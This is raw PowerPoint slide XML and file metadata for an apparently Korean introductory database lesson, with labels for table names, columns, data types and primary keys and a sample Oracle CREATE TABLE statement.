              <a:t>내용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>닫힘태그</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>&gt;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B7D4F1DB-54C6-92BE-14EA-EA82EEB432B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4375150" y="3670300"/>
            <a:ext cx="958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28F3CC9E-6C70-3660-3DE0-11A0D81B0970}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4375150" y="3956745"/>
            <a:ext cx="218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7BF5A43-1311-B53B-28C4-B67ECAA41E00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4870450" y="3943350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element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4104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12800" y="622300"/>
            <a:ext cx="9626600" cy="3644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33450" y="8064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테이블명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3600" y="850900"/>
            <a:ext cx="1517650" cy="27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12128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컬럼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>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114550" y="1257300"/>
            <a:ext cx="1384300" cy="27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age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00450" y="12573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데이터</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>형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724400" y="1301750"/>
            <a:ext cx="1384300" cy="27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 rot="10800000">
            <a:off x="5835650" y="1377950"/>
            <a:ext cx="209550" cy="1397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endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5416550" y="457200"/>
            <a:ext cx="1244600" cy="844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65900" y="241300"/>
            <a:ext cx="302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Number, varchar2,char,date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54750" y="1276350"/>
            <a:ext cx="141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Primary key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581900" y="1384300"/>
            <a:ext cx="260350" cy="222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020050" y="1365250"/>
            <a:ext cx="660400" cy="27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추가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22350" y="1689100"/>
            <a:ext cx="9023350" cy="2063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727450" y="831850"/>
            <a:ext cx="660400" cy="27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추가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321800" y="3879850"/>
            <a:ext cx="660400" cy="27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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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2050" y="1866900"/>
            <a:ext cx="61087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Create table test(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>  name varchar2(30) constraint </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>pk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primary key,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age number(3) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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rot="10800000" flipV="1">
            <a:off x="6235700" y="1047750"/>
            <a:ext cx="431800" cy="27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23050" y="7493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크</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>기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7258050" y="806450"/>
            <a:ext cx="1384300" cy="27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7850" y="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숙제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1131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704</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>사용자 지정</PresentationFormat>
  <Paragraphs>232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우신</dc:creator>
  <cp:lastModifiedBy>user</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-09T00:39:29Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-09T08:11:49Z</dcterms:modified>
</cp:coreProperties>
</file>